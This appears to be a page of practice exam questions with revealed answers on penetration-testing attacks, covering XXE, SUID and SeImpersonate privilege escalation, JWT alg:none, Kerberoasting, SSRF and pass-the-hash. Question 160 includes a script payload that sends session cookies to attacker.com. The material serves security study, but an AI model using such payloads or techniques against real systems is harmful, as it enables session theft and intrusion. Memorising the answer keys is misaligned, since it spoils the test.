CCNA Ptp Attacks Exploits Questions

31 of 181 questions · Page 3/3 · Ptp Attacks Exploits topic · Answers revealed

151
MCQ · medium

A penetration tester is testing a web application and discovers an endpoint that returns XML data. The tester attempts to read /etc/passwd by injecting an external entity. Which type of attack is this?

A. XXE injection
B. Command injection
C. SSRF
D. SQL injection

Answer: A

XXE uses external entities to read files or make requests.

Why this answer

XML External Entity (XXE) injection allows reading files or performing SSRF via XML processing.

152
MCQ · medium

While testing a Linux system, the tester finds a binary with the SUID bit set owned by root. The binary executes a command based on user input without verifying the path. Which privilege escalation technique does this exemplify?

A. Kernel exploit
B. Capability abuse
C. Cron job abuse
D. SUID binary exploitation

Answer: D

The SUID bit allows the binary to run as root, and PATH manipulation can lead to privilege escalation.

Why this answer

PATH manipulation exploits insecure binary execution by modifying the PATH variable to execute malicious code.

153
Multi-Select · hard

During a penetration test, the tester discovers a web application vulnerable to CSRF. The application uses SameSite cookies set to 'Lax'. Which THREE methods might the tester use to exploit the CSRF vulnerability?

Select 3 answers
A. Use XSS to execute a POST request
B. Change the cookie's SameSite attribute via JavaScript
C. Craft a GET request that triggers a state change
D. Use a subdomain to change the cookie's SameSite to 'None'
E. Force the form to submit via POST only

Answers: A, C, D

XSS can bypass CSRF protections entirely.

Why this answer

SameSite Lax still allows top-level GET requests; state-changing GET requests, XSS, and bypassing via a subdomain can work. An attacker cannot change the cookie to Strict, and requiring POST only is not a bypass.

154
MCQ · medium

A tester is performing a JWT attack and modifies the header to set the algorithm to 'none'. Which vulnerability are they exploiting?

A. Token theft
B. Weak secret brute-force
C. Kid injection
D. Algorithm confusion

Answer: D

alg:none is a type of algorithm confusion where the server accepts unsigned tokens.

Why this answer

Setting alg to 'none' bypasses signature verification, a known JWT vulnerability.

155
MCQ · medium

A tester has gained a low-privilege shell on a Windows machine and found that the user has the SeImpersonatePrivilege enabled. Which attack can be used to escalate privileges to SYSTEM?

A. DLL hijacking
B. Kerberoasting
C. Token impersonation using PrintSpoofer
D. AlwaysInstallElevated

Answer: C

PrintSpoofer leverages SeImpersonatePrivilege to get SYSTEM.

Why this answer

SeImpersonatePrivilege allows impersonating a client after authentication; tools like PrintSpoofer and RoguePotato exploit this to gain SYSTEM.

156
MCQ · easy

During a penetration test, you run the following command on a Linux target: `find / -type f -perm /4000 2>/dev/null`. What are you attempting to identify?

A. World-writable files
B. SUID binaries
C. Files with extended attributes
D. SGID binaries

Answer: B

/4000 matches the SUID bit (4000 in octal).

Why this answer

The find command with -perm /4000 searches for files with the SUID bit set, which can be exploited for privilege escalation.

157
MCQ · medium

A tester wants to perform a Kerberoasting attack against an Active Directory domain. The tester has a domain account with no special privileges. Which of the following is required to successfully request TGS tickets for offline cracking?

A. The service account's password hash
B. A valid domain user account
C. Administrator privileges on a domain controller
D. Local administrator access on a client machine

Answer: B

Any domain user can request TGS tickets for service accounts.

Why this answer

Kerberoasting requires a valid domain account to request TGS tickets for service accounts. No special privileges are needed beyond being authenticated. AS-REP roasting targets users without pre-authentication, not service accounts.

158
MCQ · medium

During a web application test, the tester uses sqlmap and identifies a time-based blind SQL injection. Which technique is sqlmap using to extract data?

A. Error-based SQL injection
B. Boolean-based blind SQL injection
C. UNION-based SQL injection
D. Time-based blind SQL injection

Answer: D

Time-based uses SLEEP or WAITFOR DELAY to extract data.

Why this answer

Time-based blind SQL injection uses conditional delays to infer the truth of queries based on response time.

159
MCQ · easy

In Metasploit, after searching for an exploit, you select it with 'use exploit/...' and set required options. What is the final command to execute the exploit against the target?

A. execute
B. launch
C. start
D. run

Answer: D

'run' or 'exploit' initiates the exploit.

Why this answer

The 'run' or 'exploit' command launches the exploit.

160
MCQ · medium

While performing a web application penetration test, a tester observes that the application reflects user input in the page without proper sanitization. To steal session cookies, the tester crafts a payload like `<script>document.location='http://attacker.com/?cookie='+document.cookie</script>`. Which XSS type is this?

A. Stored XSS
B. Reflected XSS
C. DOM-based XSS
D. SQL injection

Answer: B

Reflected XSS is injected and reflected immediately in the response.

Why this answer

Reflected XSS occurs when the injected script is reflected off the web server immediately.

161
Multi-Select · medium

A penetration tester wants to pivot from a compromised Linux host to attack internal network resources that are not directly accessible. Which THREE tools or techniques can be used for pivoting?

Select 3 answers
A. psexec
B. Metasploit route command
C. chisel
D. SSH local port forwarding (-L)
E. Windows Remote Desktop (RDP)

Answers: B, C, D

Metasploit route adds routes through a compromised host to pivot.

Why this answer

SSH port forwarding (local, remote, dynamic) and tools like chisel and ligolo-ng are commonly used for pivoting in Linux environments.

162
MCQ · hard

A tester is exploiting a Linux system and finds a binary with the SUID bit set owned by root. The binary executes other commands. Which technique would allow privilege escalation to root?

A. DLL hijacking
B. Kernel exploit
C. Token impersonation
D. PATH manipulation

Answer: D

If the SUID binary runs a command using a relative path, PATH manipulation can hijack it to run as root.

Why this answer

If a SUID binary executes commands (e.g., via system() or exec()), it may be exploited to run arbitrary commands as root, especially if the path is not absolute.

163
MCQ · hard

During a Windows privilege escalation attempt, a tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool can be used to exploit this privilege to gain SYSTEM access?

A. PrintSpoofer
B. PowerUp
C. CrackMapExec
D. Mimikatz

Answer: A

PrintSpoofer leverages SeImpersonatePrivilege to get SYSTEM.

Why this answer

PrintSpoofer exploits SeImpersonatePrivilege to escalate to SYSTEM.

164
Multi-Select · medium

During a Windows privilege escalation attempt, the tester finds that the current user has SeImpersonatePrivilege enabled. Which THREE tools or techniques can be used to exploit this privilege?

Select 3 answers
A. JuicyPotato
B. Mimikatz
C. RoguePotato
D. PrintSpoofer
E. PowerUp

Answers: A, C, D

Another Potato variant for the same privilege.

Why this answer

PrintSpoofer, RoguePotato, and JuicyPotato exploit SeImpersonatePrivilege to gain SYSTEM. Mimikatz is for credential dumping, and PowerUp is a PowerShell script for privilege escalation but not specific to this privilege.

165
MCQ · medium

During a web application test, you discover an endpoint that accepts a URL parameter and fetches the content. You try `http://169.254.169.254/latest/meta-data/` and receive a response. Which vulnerability is this?

A. Cross-Site Request Forgery (CSRF)
B. Local File Inclusion (LFI)
C. Server-Side Request Forgery (SSRF)
D. XML External Entity (XXE)

Answer: C

SSRF allows the server to make requests to internal/cloud resources.

Why this answer

The IP 169.254.169.254 is the cloud metadata endpoint; accessing it indicates SSRF.

166
Multi-Select · medium

A penetration tester is conducting a web application test and discovers a server-side request forgery (SSRF) vulnerability. The application accepts a URL parameter and fetches the resource. Which TWO of the following are common SSRF exploitation techniques?

Select 2 answers
A. Accessing the AWS metadata endpoint at 169.254.169.254
B. Scanning internal IP addresses and ports
C. Crafting a JavaScript payload for XSS
D. Injecting SQL queries into the URL
E. Forcing the server to send a POST request

Answers: A, B

This is a classic SSRF target.

Why this answer

SSRF can access internal services like cloud metadata endpoints and perform internal port scans.

167
MCQ · medium

During an internal penetration test, you need to perform lateral movement to a Windows target. You have a plaintext password for a domain user account. Which tool would be most appropriate to authenticate to the target using WMI?

A. CrackMapExec
B. evil-winrm
C. wmiexec
D. psexec

Answer: C

wmiexec uses WMI (Windows Management Instrumentation) for remote command execution.

Why this answer

wmiexec (part of Impacket) allows execution of commands on a Windows host via WMI using valid credentials, suitable for lateral movement.

168
MCQ · hard

During a web application penetration test, the tester discovers a JWT token in the Authorization header. The token uses the 'none' algorithm. What attack should the tester attempt?

A. JWT algorithm confusion attack (alg:none)
B. JWT timing attack
C. JWT kid injection
D. JWT brute-force of the secret

Answer: A

The alg:none attack bypasses signature verification.

Why this answer

If the server accepts the 'none' algorithm, the tester can forge tokens by setting the algorithm to 'none' and removing the signature.

169
MCQ · medium

After compromising a Windows workstation, the tester wants to extract password hashes from the local SAM database. Which Metasploit meterpreter command should be used?

A. getsystem
B. getuid
C. shell
D. hashdump

Answer: D

hashdump extracts password hashes from SAM.

Why this answer

hashdump dumps the SAM database hashes.

170
MCQ · hard

During a penetration test, the tester gains a Meterpreter session on a Windows target and wants to escalate privileges to SYSTEM. The current user has the SeImpersonatePrivilege token. Which tool should the tester use to exploit this privilege?

A. PrintSpoofer
B. Windows-Exploit-Suggester
C. whoami /priv
D. Mimikatz

Answer: A

PrintSpoofer uses SeImpersonatePrivilege to gain SYSTEM.

Why this answer

PrintSpoofer exploits the SeImpersonatePrivilege to impersonate SYSTEM tokens.

171
MCQ · hard

During a web application test, the tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester modifies the JWT header to set the algorithm to 'none' and removes the signature. The server accepts the token. What type of attack is this?

A. JWT algorithm confusion (alg:none)
B. JWT injection
C. JWT session stealing
D. JWT secret brute-force

Answer: A

This is a JWT algorithm confusion attack where the 'none' algorithm bypasses signature verification.

Why this answer

Setting the JWT algorithm to 'none' exploits a misconfiguration where the server does not enforce signature verification, leading to JWT algorithm confusion.

172
Multi-Select · medium

A penetration tester is performing a Kerberoasting attack. Which TWO steps are required for a successful Kerberoasting attack?

Select 2 answers
A. Enumerate domain admins
B. Request TGS tickets for service accounts
C. Perform a relay attack
D. Crack the TGS tickets offline using Hashcat
E. Capture NTLMv2 hashes using Responder

Answers: B, D

TGS tickets are encrypted with the service account's NTLM hash.

Why this answer

Kerberoasting involves requesting TGS tickets for service accounts and then cracking the tickets offline.

173
MCQ · medium

You are testing a web application and notice that it uses JSON Web Tokens (JWT) for authentication. You change the algorithm to 'none' and remove the signature, and the token is accepted. Which JWT vulnerability did you exploit?

A. KID injection
B. Algorithm none attack
C. Weak secret brute-force
D. Token replay

Answer: B

Setting alg to 'none' bypasses signature verification.

Why this answer

The alg:none attack exploits weak validation that accepts unsigned tokens.

174
MCQ · medium

A tester is performing a privilege escalation on a Windows system and finds that the user has SeImpersonatePrivilege enabled. Which tool could be used to escalate to SYSTEM?

A. PsExec
B. PrintSpoofer
C. evil-winrm
D. pth-winexe

Answer: B

PrintSpoofer exploits SeImpersonatePrivilege to get SYSTEM.

Why this answer

SeImpersonatePrivilege can be exploited using tools like PrintSpoofer or Potato attacks to impersonate SYSTEM tokens.

175
MCQ · hard

You have obtained an NTLM hash of a domain admin account and want to authenticate to a remote server without cracking the password. Which technique enables you to authenticate using the hash?

A. Pass-the-Hash
B. AS-REP roasting
C. Pass-the-Ticket
D. Kerberoasting

Answer: A

Pass-the-Hash uses the NTLM hash to authenticate to services that accept NTLM authentication.

Why this answer

Pass-the-Hash uses the NTLM hash directly to authenticate without needing the plaintext password. Tools like pth-winexe or CrackMapExec can perform this.

176
MCQ · easy

Which Metasploit command is used to display information about the current meterpreter session, including the target OS and user?

A. hashdump
B. getuid
C. getsystem
D. sysinfo

Answer: D

sysinfo provides detailed system information including OS and architecture.

Why this answer

The 'sysinfo' meterpreter command displays system information such as OS, architecture, and sometimes user context.

177
MCQ · hard

During a penetration test, you successfully execute a Meterpreter session on a Windows target. You want to dump password hashes from the SAM database. Which Meterpreter command should you use?

A. getsystem
B. hashdump
C. getuid
D. sysinfo

Answer: B

hashdump retrieves password hashes from the SAM.

Why this answer

hashdump is the Meterpreter command to dump SAM hashes.

178
MCQ · medium

A penetration tester has gained a low-privilege shell on a Windows server and discovers the user has the SeImpersonatePrivilege. Which tool could the tester use to escalate privileges to SYSTEM?

A. Mimikatz
B. SharpHound
C. PowerUp
D. PrintSpoofer

Answer: D

PrintSpoofer leverages SeImpersonatePrivilege to get SYSTEM access.

Why this answer

PrintSpoofer exploits SeImpersonatePrivilege to escalate privileges on Windows.

179
MCQ · medium

During a Windows privilege escalation attempt, the tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool is commonly used to exploit this privilege to gain SYSTEM?

A. PrintSpoofer
B. SharpUp
C. Mimikatz
D. PowerUp

Answer: A

PrintSpoofer leverages SeImpersonatePrivilege to escalate to SYSTEM.

Why this answer

PrintSpoofer exploits SeImpersonatePrivilege to impersonate SYSTEM and spawn a shell.

180
MCQ · medium

During a Linux privilege escalation attempt, a tester finds a binary with the SUID bit set that is not on the GTFOBins list. The binary executes /bin/bash with the effective UID of root. What is the most likely way to exploit this?

A. Use GTFOBins to find a suitable exploit
B. Perform a buffer overflow on the binary
C. Run the binary with the -p flag
D. Modify the PATH to include a fake binary

Answer: C

Running a SUID binary that spawns a shell with -p preserves the effective UID, giving root.

Why this answer

If a binary runs a shell or command as root, the tester can simply run it to get a root shell.

181
MCQ · easy

A tester is attempting to crack WPA2 handshakes captured from a wireless network. Which hashcat mode should be used?

A. -m 13100
B. -m 1000
C. -m 0
D. -m 22000

Answer: D

Mode 22000 is for WPA/WPA2.

Why this answer

Hashcat mode 22000 is used for WPA-PBKDF2-PMKID+EAPOL (WPA/WPA2) handshakes.
